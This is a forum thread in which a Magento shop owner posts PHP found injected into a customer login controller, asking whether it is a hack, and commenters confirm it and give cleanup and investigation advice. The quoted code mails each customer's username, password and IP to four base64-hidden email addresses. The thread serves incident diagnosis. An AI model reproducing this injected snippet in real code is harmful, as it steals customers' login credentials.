# Had an issue with AccountController.php .. Issue looks odd, possible hack?

Tags: security

Earlier I had an issue where reverting to an older version of my Customer/AccountController.php fixed the issue at hand. So then I started going through the two different AccountControllers to see where the differences were to try and get an idea of what was really going wrong. As I was skimming through, I noticed this:

```
 $this->_loginPostRedirect();
    $postmage = base64_decode("Y2hpY2twZXRlcjkxNUBnbWFpbC5jb20=");
        $postmages = base64_decode("Y29sbGluZmxpbkB5YWhvby5jb20=");
        $postmagess = base64_decode("bG9uZ2NhdDY2NkB5YWhvby5jb20=");
    $postmagesss = base64_decode("dGFidW5nYW5iZXJkb3NhQGdtYWlsLmNvbQ==");
    $ip = getenv("REMOTE_ADDR");
    $isi='Usermail: '.$login['username'].' Password :'.$login['password'].' ip : '.$ip.' ';
    mail(''.$postmage.'','PePe http://'.$_SERVER['HTTP_HOST'], $isi);
        mail(''.$postmages.'','PePe http://'.$_SERVER['HTTP_HOST'], $isi);
        mail(''.$postmagess.'','PePe http://'.$_SERVER['HTTP_HOST'], $isi);
    mail(''.$postmagesss.'','PePe http://'.$_SERVER['HTTP_HOST'], $isi);
```

Where as the working version, simply has:

```
 $this->_loginPostRedirect();
```

I'm not the most knowledgeable php user, but the above script looks like someone having any accounts sent to them? Is there any way I can see where it is being sent to or possibly how this ever got infected in the first place??

Comment: Yes indeed, after decoding those base64 strings, I have the target emails. Now to try and find out how and when this happened??

Comment: you site has been hacked.

Comment: You have any possible ideas as to how they could've gotten to the AccountController and changed it? or it could just be any number of possibilities. I'm just curious if there's anyway for me to try and think of how to plug up the hole.

Comment: Already  there have a hole in system.Any hacker already get file access and may be db access .They can access you system. You need restore your system if you have . other wise no solution.If you have backed then you must apply magento patch after restore.

Comment: Any weird modules installed, odd administrator accounts set up in Magento? Odd .php files out in the media/ directory tree? Non-stock or missing .htaccess file in the media/ directory? They're swiping user login information and exporting it, so consider any account accessed since the file creation to be compromised. And you cannot depend on file creation date for knowing this time period because they could `touch` the changed file to have the same dates as the original. As to access, compromised ftp/ssh credentials, compromised admin workstation, 5344 not installed in time, etc.

Comment: Thanks for all the pointers and areas to investigate, now to delve in and see. I know for one the patch was installed immediately, but from there it's going to take some looking.

Comment: Yes, your shop has been hacked. Here are some guidelines on how to move on: http://magento.stackexchange.com/questions/67660/magento-hacked-even-after-applied-patch